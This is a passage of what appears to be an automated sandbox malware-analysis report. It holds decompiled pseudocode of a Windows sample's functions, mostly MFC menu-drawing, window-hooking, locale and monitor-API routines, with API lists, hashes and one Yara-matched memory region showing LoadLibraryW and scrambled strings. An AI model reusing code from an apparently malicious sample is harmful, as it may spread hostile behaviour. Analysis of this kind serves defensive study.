                  					E00423E9D(_t399, _t218 + 0x1c,  *(_t400 - 0x1c));
                  					 *((intOrPtr*)( *_t399 + 0x2c))( *(_t400 - 0x1c));
                  					_t224 =  *( *((intOrPtr*)(_t400 + 8)) + 0x10);
                  					__eflags = _t224 & 0x00000002;
                  					if((_t224 & 0x00000002) == 0) {
                  						__eflags =  *(_t400 - 0x3c);
                  						if( *(_t400 - 0x3c) != 0) {
                  							__eflags = _t224 & 0x00000008;
                  							if((_t224 & 0x00000008) != 0) {
                  								 *((intOrPtr*)(_t400 - 0x10)) =  *((intOrPtr*)(_t400 - 0x20)) -  *((intOrPtr*)(_t400 - 0x28));
                  								 *((intOrPtr*)(_t400 - 0x34)) =  *((intOrPtr*)(_t400 - 0x24)) -  *(_t400 - 0x2c);
                  								_t266 = GetSysColor(0x14);
                  								_t267 = GetSysColor(0x10);
                  								__eflags =  *((intOrPtr*)(_t400 - 0x34)) + 1;
                  								E00424022(_t399,  *((intOrPtr*)(_t400 - 0x34)) + 1,  *(_t400 - 0x2c),  *((intOrPtr*)(_t400 - 0x28)),  *((intOrPtr*)(_t400 - 0x34)) + 1,  *((intOrPtr*)(_t400 - 0x10)) + 1, _t267, _t266);
                  							}
                  						}
                  						__eflags =  *(_t400 - 0x18);
                  						if(__eflags == 0) {
                  							goto L25;
                  						} else {
                  							 *((intOrPtr*)( *_t399 + 0x2c))( *(_t400 - 0x1c));
                  							 *((intOrPtr*)(_t400 - 0x10)) =  *_t399;
                  							 *((intOrPtr*)( *((intOrPtr*)(_t400 - 0x10)) + 0x30))(GetSysColor(7));
                  							goto L23;
                  						}
                  					}
                  					 *((intOrPtr*)(_t400 - 0x10)) =  *_t399;
                  					 *((intOrPtr*)( *((intOrPtr*)(_t400 - 0x10)) + 0x30))(GetSysColor(0x14));
                  					E00422504(_t399, 1);
                  					__eflags =  *(_t400 - 0x18);
                  					if(__eflags == 0) {
                  						goto L25;
                  					}
                  					asm("cdq");
                  					 *(_t400 - 0x18) =  *((intOrPtr*)(_t400 - 0x40)) - _t388;
                  					 *(_t400 - 0x18) =  *(_t400 - 0x18) >> 1;
                  					asm("cdq");
                  					E0041F58B(_t399,  *((intOrPtr*)(_t400 - 0x24)) + 4, ( *((intOrPtr*)(_t400 - 0x20)) -  *((intOrPtr*)(_t400 - 0x28)) - _t388 >> 1) -  *(_t400 - 0x18) +  *((intOrPtr*)(_t400 - 0x28)) + 1, 2, 0, _t400 - 0x30, 0);
                  					 *((intOrPtr*)(_t400 - 0x10)) =  *_t399;
                  					 *((intOrPtr*)( *((intOrPtr*)(_t400 - 0x10)) + 0x30))(GetSysColor(0x11));
                  					_push(0);
                  					_push(_t400 - 0x30);
                  					_push(0);
                  					asm("cdq");
                  					_push(0);
                  					_push(( *((intOrPtr*)(_t400 - 0x20)) -  *((intOrPtr*)(_t400 - 0x28)) - _t388 >> 1) -  *(_t400 - 0x18) +  *((intOrPtr*)(_t400 - 0x28)));
                  					goto L24;
                  				} else {
                  					E00413342(_t400 - 0x60, _t218 + 0x1c);
                  					 *((intOrPtr*)(_t400 - 0x60)) =  *((intOrPtr*)(_t400 - 0x24)) + 2;
                  					E00423E9D(_t399, _t400 - 0x60, GetSysColor(0xd));
                  					if( *(_t400 - 0x3c) != 0 && ( *( *((intOrPtr*)(_t400 + 8)) + 0x10) & 0x0000000a) == 0) {
                  						 *((intOrPtr*)(_t400 - 0x34)) =  *((intOrPtr*)(_t400 - 0x20)) -  *((intOrPtr*)(_t400 - 0x28));
                  						 *((intOrPtr*)(_t400 - 0x10)) =  *((intOrPtr*)(_t400 - 0x24)) -  *(_t400 - 0x2c);
                  						_t320 = GetSysColor(0x10);
                  						E00424022(_t399,  *((intOrPtr*)(_t400 - 0x10)) + 1,  *(_t400 - 0x2c),  *((intOrPtr*)(_t400 - 0x28)),  *((intOrPtr*)(_t400 - 0x10)) + 1,  *((intOrPtr*)(_t400 - 0x34)) + 1, GetSysColor(0x14), _t320);
                  					}
                  					if( *(_t400 - 0x18) == 0) {
                  						L25:
                  						if( *(_t400 - 0x3c) == 0) {
                  							L32:
                  							 *((intOrPtr*)( *_t399 + 0x20))( *((intOrPtr*)(_t400 - 0x50)));
                  							 *((char*)(_t400 - 4)) = 0;
                  							E00422E06(_t400 - 0x88);
                  							return E00431B73(E004010B0( *((intOrPtr*)(_t400 - 0x30)) + 0xfffffff0, _t388));
                  						}
                  						 *((intOrPtr*)(_t400 - 0x10)) = 0;
                  						 *((intOrPtr*)(_t400 - 0x14)) = 0x4502c8;
                  						_t231 =  *( *((intOrPtr*)(_t400 + 8)) + 0x10);
                  						 *((char*)(_t400 - 4)) = 2;
                  						_t417 = _t231 & 0x00000002;
                  						if((_t231 & 0x00000002) == 0) {
                  							__eflags = _t231 & 0x00000008;
                  							if(__eflags == 0) {
                  								L31:
                  								E00422859(_t400 - 0x4c);
                  								 *((char*)(_t400 - 4)) = 3;
                  								E0040876B(_t400 - 0x4c, 0);
                  								E00408791(_t400 - 0x4c,  *((intOrPtr*)(_t400 - 0x38)));
                  								InflateRect(_t400 - 0x2c, 0xffffffff, 0xffffffff);
                  								E0041F40E(_t399,  *(_t400 - 0x2c),  *((intOrPtr*)(_t400 - 0x28)),  *((intOrPtr*)(_t400 - 0x24)),  *((intOrPtr*)(_t400 - 0x20)), _t400 - 0x4c, 0, 0, 0xcc0020);
                  								 *((char*)(_t400 - 4)) = 2;
                  								E00422E06(_t400 - 0x4c);
                  								 *((char*)(_t400 - 4)) = 1;
                  								 *((intOrPtr*)(_t400 - 0x14)) = 0x4502c8;
                  								E0040ADD4(0, _t400 - 0x14, 0x4502c8, _t399, _t417);
                  								goto L32;
                  							}
                  							_push(0xffffff);
                  							_push( *(_t400 - 0x1c));
                  							_push(_t400 - 0x14);
                  							_push( *((intOrPtr*)(_t400 - 0x38)));
                  							E004234DC(0, 0x4502c8, _t399, __eflags);
                  							L30:
                  							 *((intOrPtr*)(_t400 - 0x38)) = _t400 - 0x14;
                  							goto L31;
                  						}
                  						_push( *(_t400 - 0x1c));
                  						_push(_t400 - 0x14);
                  						_push( *((intOrPtr*)(_t400 - 0x38)));
                  						E00423285(0, 0x4502c8, _t399, _t417);
                  						goto L30;
                  					} else {
                  						 *((intOrPtr*)(_t400 - 0x10)) =  *_t399;
                  						 *((intOrPtr*)( *((intOrPtr*)(_t400 - 0x10)) + 0x2c))(GetSysColor(0xd));
                  						if(( *( *((intOrPtr*)(_t400 + 8)) + 0x10) & 0x00000002) == 0) {
                  							_t313 = GetSysColor(0xe);
                  						} else {
                  							_t313 =  *(_t400 - 0x1c);
                  						}
                  						_t388 =  *_t399;
                  						 *((intOrPtr*)(_t388 + 0x30))(_t313);
                  						L23:
                  						_push(0);
                  						_push(_t400 - 0x30);
                  						_push(0);
                  						asm("cdq");
                  						asm("cdq");
                  						_push(2);
                  						_push(( *((intOrPtr*)(_t400 - 0x20)) -  *((intOrPtr*)(_t400 - 0x28)) - _t388 >> 1) - ( *((intOrPtr*)(_t400 - 0x40)) - _t388 >> 1) +  *((intOrPtr*)(_t400 - 0x28)));
                  						L24:
                  						_push( *((intOrPtr*)(_t400 - 0x24)) + 3);
                  						E0041F58B(_t399);
                  						goto L25;
                  					}
                  				}
                  			}

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041F7F7
                    • Part of subcall function 00406039: __EH_prolog3.LIBCMT ref: 00406040
                  • _memset.LIBCMT ref: 0041F832
                  • GetMenuItemInfoA.USER32 ref: 0041F863
                  • GetMenuItemInfoA.USER32 ref: 0041F899
                  • GetObjectA.GDI32(?,00000018,?), ref: 0041F8E5
                  • GetSystemMetrics.USER32 ref: 0041F8F8
                  • GetSystemMetrics.USER32 ref: 0041F902
                  • GetSysColor.USER32(00000004), ref: 0041F943
                  • GetSysColor.USER32(0000000D), ref: 0041F9AF
                  • GetSysColor.USER32(00000010), ref: 0041F9DF
                  • GetSysColor.USER32(00000014), ref: 0041F9E4
                  • GetSysColor.USER32(0000000D), ref: 0041FA0E
                  • GetSysColor.USER32(0000000E), ref: 0041FA29
                    • Part of subcall function 00423E9D: SetBkColor.GDI32(00000200,?), ref: 00423EC1
                    • Part of subcall function 00423E9D: ExtTextOutA.GDI32(00000200,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 00423ED4
                  • GetSysColor.USER32(00000014), ref: 0041FA65
                    • Part of subcall function 00422504: SetBkMode.GDI32(?,?), ref: 00422521
                    • Part of subcall function 00422504: SetBkMode.GDI32(?,?), ref: 0042252E
                    • Part of subcall function 0041F58B: ExtTextOutA.GDI32(?,?,?,?,?,?,?,?), ref: 0041F5AC
                  • GetSysColor.USER32(00000011), ref: 0041FAC0
                  • GetSysColor.USER32(00000014), ref: 0041FB06
                  • GetSysColor.USER32(00000010), ref: 0041FB0B
                  • GetSysColor.USER32(00000007), ref: 0041FB3B
                  • InflateRect.USER32(?,000000FF,000000FF), ref: 0041FBF0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Color$H_prolog3InfoItemMenuMetricsModeSystemText$InflateObjectRect_memset
                  • String ID: 0$46E$@
                  • API String ID: 3743147133-3652610858
                  • Opcode ID: 51d2bea7bd644e3431cdd1b914a9e6e16b4e9d200d04218f16f2602888e0cc88
                  • Instruction ID: 7f78c14f1eea8d06dfa9bbb1ad9c7d036a1403066194708c7aa81ff3ee08e1b5
                  • Opcode Fuzzy Hash: 51d2bea7bd644e3431cdd1b914a9e6e16b4e9d200d04218f16f2602888e0cc88
                  • Instruction Fuzzy Hash: 85F12B71A00219AFCF04DFA9C985EEEBBB9FF48304F14415AF505A7291DB34AA45CF54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 91%
                  			E00410CBA(void* __ebx, intOrPtr __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t54;
                  				signed int _t56;
                  				signed int _t59;
                  				long _t60;
                  				signed int _t64;
                  				void* _t66;
                  				signed int _t72;
                  				signed int _t74;
                  				signed int _t76;
                  				long _t83;
                  				signed int _t86;
                  				signed short _t87;
                  				signed int _t88;
                  				int _t94;
                  				void* _t106;
                  				long* _t108;
                  				long _t110;
                  				signed int _t111;
                  				CHAR* _t112;
                  				intOrPtr _t113;
                  				void* _t116;
                  				void* _t119;
                  				intOrPtr _t120;
                  
                  				_t119 = __eflags;
                  				_t105 = __edi;
                  				_push(0x148);
                  				E00431B04(E0044B0DA, __ebx, __edi, __esi);
                  				_t110 =  *(_t116 + 0x10);
                  				_t94 =  *(_t116 + 0xc);
                  				_push(0x406452);
                  				 *(_t116 - 0x120) = _t110;
                  				_t54 = E00420AEC(_t94, 0x466508, __edi, _t110, _t119);
                  				_t120 = _t54;
                  				_t97 = 0 | _t120 == 0x00000000;
                  				 *((intOrPtr*)(_t116 - 0x11c)) = _t54;
                  				_t121 = _t120 == 0;
                  				if(_t120 == 0) {
                  					_t54 = E00406436(_t94, _t97, __edi, _t110, _t121);
                  				}
                  				if( *(_t116 + 8) == 3) {
                  					_t106 =  *_t110;
                  					_t111 =  *(_t54 + 0x14);
                  					_t56 =  *(E0041F363(_t94, _t106, _t111, __eflags) + 0x14) & 0x000000ff;
                  					 *(_t116 - 0x124) = _t56;
                  					__eflags = _t111;
                  					if(_t111 != 0) {
                  						L7:
                  						__eflags =  *0x4668d4;
                  						if( *0x4668d4 == 0) {
                  							L12:
                  							__eflags = _t111;
                  							if(__eflags == 0) {
                  								__eflags =  *0x4664a4;
                  								if( *0x4664a4 != 0) {
                  									L19:
                  									__eflags = (GetClassLongA(_t94, 0xffffffe0) & 0x0000ffff) -  *0x4664a4; // 0x8000
                  									if(__eflags != 0) {
                  										L23:
                  										_t59 = GetWindowLongA(_t94, 0xfffffffc);
                  										 *(_t116 - 0x14) = _t59;
                  										__eflags = _t59;
                  										if(_t59 != 0) {
                  											_t112 = "AfxOldWndProc423";
                  											_t64 = GetPropA(_t94, _t112);
                  											__eflags = _t64;
                  											if(_t64 == 0) {
                  												SetPropA(_t94, _t112,  *(_t116 - 0x14));
                  												_t66 = GetPropA(_t94, _t112);
                  												__eflags = _t66 -  *(_t116 - 0x14);
                  												if(_t66 ==  *(_t116 - 0x14)) {
                  													GlobalAddAtomA(_t112);
                  													SetWindowLongA(_t94, 0xfffffffc, E00410B6D);
                  												}
                  											}
                  										}
                  										L27:
                  										_t105 =  *((intOrPtr*)(_t116 - 0x11c));
                  										_t60 = CallNextHookEx( *(_t105 + 0x28), 3, _t94,  *(_t116 - 0x120));
                  										__eflags =  *(_t116 - 0x124);
                  										_t110 = _t60;
                  										if( *(_t116 - 0x124) != 0) {
                  											UnhookWindowsHookEx( *(_t105 + 0x28));
                  											_t50 = _t105 + 0x28;
                  											 *_t50 =  *(_t105 + 0x28) & 0x00000000;
                  											__eflags =  *_t50;
                  										}
                  										goto L30;
                  									}
                  									goto L27;
                  								}
                  								_t113 = 0x30;
                  								E00431160(_t106, _t116 - 0x154, 0, _t113);
                  								 *((intOrPtr*)(_t116 - 0x154)) = _t113;
                  								_push(_t116 - 0x154);
                  								_push("#32768");
                  								_push(0);
                  								_t72 = E0040D4AB(_t94, _t97, _t106, "#32768", __eflags);
                  								 *0x4664a4 = _t72;
                  								__eflags = _t72;
                  								if(_t72 == 0) {
                  									_t74 = GetClassNameA(_t94, _t116 - 0x118, 0x100);
                  									__eflags = _t74;
                  									if(_t74 == 0) {
                  										goto L23;
                  									}
                  									 *((char*)(_t116 - 0x19)) = 0;
                  									_t76 = E004336E0(_t116 - 0x118, "#32768");
                  									__eflags = _t76;
                  									if(_t76 == 0) {
                  										goto L27;
                  									}
                  									goto L23;
                  								}
                  								goto L19;
                  							}
                  							E0041F3AF(_t116 - 0x18, __eflags,  *((intOrPtr*)(_t111 + 0x1c)));
                  							 *(_t116 - 4) =  *(_t116 - 4) & 0x00000000;
                  							E0040EE89(_t111, _t94);
                  							 *((intOrPtr*)( *_t111 + 0x50))();
                  							_t108 =  *((intOrPtr*)( *_t111 + 0xf8))();
                  							_t83 = SetWindowLongA(_t94, 0xfffffffc, E0040F720);
                  							__eflags = _t83 - E0040F720;
                  							if(_t83 != E0040F720) {
                  								 *_t108 = _t83;
                  							}
                  							 *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) & 0x00000000;
                  							 *(_t116 - 4) =  *(_t116 - 4) | 0xffffffff;
                  							__eflags =  *(_t116 - 0x14);
                  							if( *(_t116 - 0x14) != 0) {
                  								_push( *(_t116 - 0x18));
                  								_push(0);
                  								E0041EAC0();
                  							}
                  							goto L27;
                  						}
                  						_t86 = GetClassLongA(_t94, 0xffffffe6);
                  						__eflags = _t86 & 0x00010000;
                  						if((_t86 & 0x00010000) != 0) {
                  							goto L27;
                  						}
                  						_t87 =  *(_t106 + 0x28);
                  						__eflags = _t87 - 0xffff;
                  						if(_t87 <= 0xffff) {
                  							 *(_t116 - 0x18) = 0;
                  							GlobalGetAtomNameA( *(_t106 + 0x28) & 0x0000ffff, _t116 - 0x18, 5);
                  							_t87 = _t116 - 0x18;
                  						}
                  						_t88 = E0040D6F3(_t87, "ime");
                  						_pop(_t97);
                  						__eflags = _t88;
                  						if(_t88 == 0) {
                  							goto L27;
                  						}
                  						goto L12;
                  					}
                  					__eflags =  *(_t106 + 0x20) & 0x40000000;
                  					if(( *(_t106 + 0x20) & 0x40000000) != 0) {
                  						goto L27;
                  					}
                  					__eflags = _t56;
                  					if(_t56 != 0) {
                  						goto L27;
                  					}
                  					goto L7;
                  				} else {
                  					CallNextHookEx( *(_t54 + 0x28),  *(_t116 + 8), _t94, _t110);
                  					L30:
                  					return E00431B87(_t94, _t105, _t110);
                  				}
                  			}

                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 00410CC4
                    • Part of subcall function 00420AEC: __EH_prolog3.LIBCMT ref: 00420AF3
                  • CallNextHookEx.USER32 ref: 00410D08
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  • GetClassLongA.USER32 ref: 00410D4C
                  • GlobalGetAtomNameA.KERNEL32 ref: 00410D76
                  • SetWindowLongA.USER32 ref: 00410DCB
                  • _memset.LIBCMT ref: 00410E15
                  • GetClassLongA.USER32 ref: 00410E45
                  • GetClassNameA.USER32(?,?,00000100), ref: 00410E66
                  • GetWindowLongA.USER32 ref: 00410E8A
                  • GetPropA.USER32 ref: 00410EA4
                  • SetPropA.USER32(?,AfxOldWndProc423,?), ref: 00410EAF
                  • GetPropA.USER32 ref: 00410EB7
                  • GlobalAddAtomA.KERNEL32 ref: 00410EBF
                  • SetWindowLongA.USER32 ref: 00410ECD
                  • CallNextHookEx.USER32 ref: 00410EE5
                  • UnhookWindowsHookEx.USER32(?), ref: 00410EF9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Long$ClassHookPropWindow$AtomCallGlobalH_prolog3NameNext$Exception@8H_prolog3_ThrowUnhookWindows_memset
                  • String ID: #32768$AfxOldWndProc423$ime
                  • API String ID: 1191297049-4034971020
                  • Opcode ID: e5ae81d980a84f8551ec54e42acd0f54d674218401d2fe6b82eb2adcea4507fa
                  • Instruction ID: 32270c68322271c2e59bf9d54f63d676ca0dffc6bbc1c643ca40a15bfc5c9aae
                  • Opcode Fuzzy Hash: e5ae81d980a84f8551ec54e42acd0f54d674218401d2fe6b82eb2adcea4507fa
                  • Instruction Fuzzy Hash: 1061E43150031AABCB219B62DC09BEF7B78FF05325F100566F505A6291DBB8DAC1CBAD
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 87%
                  			E004153B2(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                  				struct HINSTANCE__* _t61;
                  				_Unknown_base(*)()* _t62;
                  				struct HINSTANCE__* _t63;
                  				struct HINSTANCE__* _t76;
                  				unsigned int _t79;
                  				signed short _t87;
                  				unsigned int _t88;
                  				_Unknown_base(*)()* _t95;
                  				signed short _t97;
                  				unsigned int _t98;
                  				signed int _t106;
                  				signed int _t118;
                  				signed int _t127;
                  				void* _t130;
                  
                  				_push(0x15c);
                  				E00431B04(E0044B29F, __ebx, __edi, __esi);
                  				 *((intOrPtr*)(_t130 - 0x124)) =  *((intOrPtr*)(_t130 + 8));
                  				_t123 = 0;
                  				 *((intOrPtr*)(_t130 - 0x130)) =  *((intOrPtr*)(_t130 + 0xc));
                  				 *(_t130 - 0x120) = 0;
                  				 *(_t130 - 0x11c) = 0;
                  				_t61 = GetModuleHandleA("kernel32.dll");
                  				_t106 = GetProcAddress;
                  				 *(_t130 - 0x134) = _t61;
                  				_t62 = GetProcAddress(_t61, "GetUserDefaultUILanguage");
                  				if(_t62 == 0) {
                  					_t63 = GetModuleHandleA("ntdll.dll");
                  					if(_t63 != 0) {
                  						 *(_t130 - 0x120) = 0;
                  						EnumResourceLanguagesA(_t63, 0x10, 1, E00414A3E, _t130 - 0x120);
                  						if( *(_t130 - 0x120) != 0) {
                  							_t79 =  *(_t130 - 0x120) & 0x0000ffff;
                  							_t123 = _t79 & 0x3ff;
                  							 *((intOrPtr*)(_t130 - 0x148)) = ConvertDefaultLocale(_t79 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t123);
                  							 *((intOrPtr*)(_t130 - 0x144)) = ConvertDefaultLocale(_t123);
                  							 *(_t130 - 0x11c) = 2;
                  						}
                  					}
                  				} else {
                  					_t87 =  *_t62() & 0x0000ffff;
                  					 *(_t130 - 0x120) = _t87;
                  					_t88 = _t87 & 0x0000ffff;
                  					_t123 = 0x3ff;
                  					_t118 = _t88 & 0x3ff;
                  					 *(_t130 - 0x11c) = _t118;
                  					 *((intOrPtr*)(_t130 - 0x148)) = ConvertDefaultLocale(_t88 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t118);
                  					 *((intOrPtr*)(_t130 - 0x144)) = ConvertDefaultLocale( *(_t130 - 0x11c));
                  					 *(_t130 - 0x11c) = 2;
                  					_t95 = GetProcAddress( *(_t130 - 0x134), "GetSystemDefaultUILanguage");
                  					if(_t95 != 0) {
                  						_t97 =  *_t95() & 0x0000ffff;
                  						 *(_t130 - 0x120) = _t97;
                  						_t98 = _t97 & 0x0000ffff;
                  						_t123 = _t98 & 0x3ff;
                  						 *((intOrPtr*)(_t130 - 0x140)) = ConvertDefaultLocale(_t98 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t123);
                  						 *((intOrPtr*)(_t130 - 0x13c)) = ConvertDefaultLocale(_t123);
                  						 *(_t130 - 0x11c) = 4;
                  					}
                  				}
                  				 *(_t130 - 0x11c) =  &(1[ *(_t130 - 0x11c)]);
                  				 *((intOrPtr*)(_t130 +  *(_t130 - 0x11c) * 4 - 0x148)) = 0x800;
                  				_t126 = 0x400000;
                  				 *((char*)(_t130 - 0x13)) = 0;
                  				 *((char*)(_t130 - 0x14)) = 0;
                  				if(GetModuleFileNameA(0x400000, _t130 - 0x118, 0x105) != 0) {
                  					_t123 = 0x20;
                  					_t106 = 0;
                  					E00431160(_t123, _t130 - 0x168, 0, _t123);
                  					 *(_t130 - 0x168) = _t123;
                  					 *((intOrPtr*)(_t130 - 0x160)) = _t130 - 0x118;
                  					 *((intOrPtr*)(_t130 - 0x154)) = 0x3e8;
                  					 *(_t130 - 0x14c) = 0x400000;
                  					 *((intOrPtr*)(_t130 - 0x164)) = 0x88;
                  					E00414A58(_t130 - 0x12c, 0xffffffff);
                  					 *(_t130 - 4) = 0;
                  					if(E00414B0F(_t130 - 0x12c, _t130 - 0x168) != 0) {
                  						E00414B49(_t130 - 0x12c);
                  					}
                  					_t127 = 0;
                  					if( *(_t130 - 0x11c) <= _t106) {
                  						L13:
                  						_t126 = 0;
                  						goto L15;
                  					} else {
                  						while(1) {
                  							_t76 = E00415026( *((intOrPtr*)(_t130 - 0x124)),  *((intOrPtr*)(_t130 - 0x130)), _t123,  *((intOrPtr*)(_t130 + _t127 * 4 - 0x148)));
                  							if(_t76 != _t106) {
                  								_t126 = _t76;
                  								break;
                  							}
                  							_t127 =  &(1[_t127]);
                  							if(_t127 <  *(_t130 - 0x11c)) {
                  								continue;
                  							}
                  							goto L13;
                  						}
                  						L15:
                  						 *(_t130 - 4) =  *(_t130 - 4) | 0xffffffff;
                  						E004150F8(_t130 - 0x12c);
                  						goto L7;
                  					}
                  				}
                  				L7:
                  				return E00431B87(_t106, _t123, _t126);
                  			}

                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 004153BC
                  • GetModuleHandleA.KERNEL32(kernel32.dll,0000015C,00415683,?,?), ref: 004153EC
                  • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 00415400
                  • ConvertDefaultLocale.KERNEL32(?), ref: 0041543C
                  • ConvertDefaultLocale.KERNEL32(?), ref: 0041544A
                  • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 00415467
                  • ConvertDefaultLocale.KERNEL32(?), ref: 00415492
                  • ConvertDefaultLocale.KERNEL32(000003FF), ref: 0041549B
                  • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 004154B4
                  • EnumResourceLanguagesA.KERNEL32(00000000,00000010,00000001,Function_00014A3E,?), ref: 004154D1
                  • ConvertDefaultLocale.KERNEL32(?), ref: 00415504
                  • ConvertDefaultLocale.KERNEL32(00000000), ref: 0041550D
                  • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00415550
                  • _memset.LIBCMT ref: 00415570
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ConvertDefaultLocale$Module$AddressHandleProc$EnumFileH_prolog3_LanguagesNameResource_memset
                  • String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                  • API String ID: 3537336938-2299501126
                  • Opcode ID: bfbc1c96aaba27a77679c78974248008ba7ab69e62fdb767fd29b078a1314c47
                  • Instruction ID: 276f3bedf62ddd5b22347acf92b6dc6af1d8d2188565f558e9842f9ecaecafdf
                  • Opcode Fuzzy Hash: bfbc1c96aaba27a77679c78974248008ba7ab69e62fdb767fd29b078a1314c47
                  • Instruction Fuzzy Hash: B2515E70D002289BCB61DF65CC457EEBAB5AF99304F1041EBE949E3290D7789E81CF98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 02319CDE
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, Offset: 02311000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2311000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: ro$!x,5$)Zk$,UiB$:@Q^$;.\$>7$@}$SL2X$]|F,$c$tW/$u-0V${!*2$YsV$^qr
                  • API String ID: 1029625771-3671267125
                  • Opcode ID: 4a45dd45196d96610dfd7f8a7a560177df2ffaaa5bbf151ccc9b661bb659292f
                  • Instruction ID: c373fe405948ae7ade5331c2273c369e40a6b9e4508a42acd49b66be704a3395
                  • Opcode Fuzzy Hash: 4a45dd45196d96610dfd7f8a7a560177df2ffaaa5bbf151ccc9b661bb659292f
                  • Instruction Fuzzy Hash: 7372B5F48167A98BDB65DF419E847CEBA34BB51305F5082C8C26C3A214CB750B86CF8A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 97%
                  			E0040C354() {
                  				void* __ebx;
                  				void* __esi;
                  				void* _t5;
                  				_Unknown_base(*)()* _t6;
                  				_Unknown_base(*)()* _t7;
                  				_Unknown_base(*)()* _t8;
                  				_Unknown_base(*)()* _t9;
                  				_Unknown_base(*)()* _t10;
                  				_Unknown_base(*)()* _t11;
                  				_Unknown_base(*)()* _t12;
                  				signed int _t16;
                  				signed int _t17;
                  				struct HINSTANCE__* _t19;
                  				void* _t21;
                  				void* _t24;
                  				void* _t25;
                  
                  				_t17 = _t16 ^ _t16;
                  				_t24 =  *0x466334 - _t17; // 0x0
                  				if(_t24 == 0) {
                  					_push(_t21);
                  					 *0x466338 = E0040C2FA(_t17, _t21, __eflags);
                  					_t19 = GetModuleHandleA("USER32");
                  					__eflags = _t19 - _t17;
                  					if(_t19 == _t17) {
                  						L12:
                  						 *0x466318 = _t17;
                  						 *0x46631c = _t17;
                  						 *0x466320 = _t17;
                  						 *0x466324 = _t17;
                  						 *0x466328 = _t17;
                  						 *0x46632c = _t17;
                  						 *0x466330 = _t17;
                  						_t5 = 0;
                  					} else {
                  						_t6 = GetProcAddress(_t19, "GetSystemMetrics");
                  						 *0x466318 = _t6;
                  						__eflags = _t6 - _t17;
                  						if(_t6 == _t17) {
                  							goto L12;
                  						} else {
                  							_t7 = GetProcAddress(_t19, "MonitorFromWindow");
                  							 *0x46631c = _t7;
                  							__eflags = _t7 - _t17;
                  							if(_t7 == _t17) {
                  								goto L12;
                  							} else {
                  								_t8 = GetProcAddress(_t19, "MonitorFromRect");
                  								 *0x466320 = _t8;
                  								__eflags = _t8 - _t17;
                  								if(_t8 == _t17) {
                  									goto L12;
                  								} else {
                  									_t9 = GetProcAddress(_t19, "MonitorFromPoint");
                  									 *0x466324 = _t9;
                  									__eflags = _t9 - _t17;
                  									if(_t9 == _t17) {
                  										goto L12;
                  									} else {
                  										_t10 = GetProcAddress(_t19, "EnumDisplayMonitors");
                  										 *0x46632c = _t10;
                  										__eflags = _t10 - _t17;
                  										if(_t10 == _t17) {
                  											goto L12;
                  										} else {
                  											_t11 = GetProcAddress(_t19, "GetMonitorInfoA");
                  											 *0x466328 = _t11;
                  											__eflags = _t11 - _t17;
                  											if(_t11 == _t17) {
                  												goto L12;
                  											} else {
                  												_t12 = GetProcAddress(_t19, "EnumDisplayDevicesA");
                  												 *0x466330 = _t12;
                  												__eflags = _t12 - _t17;
                  												if(_t12 == _t17) {
                  													goto L12;
                  												} else {
                  													_t5 = 1;
                  													__eflags = 1;
                  												}
                  											}
                  										}
                  									}
                  								}
                  							}
                  						}
                  					}
                  					 *0x466334 = 1;
                  					return _t5;
                  				} else {
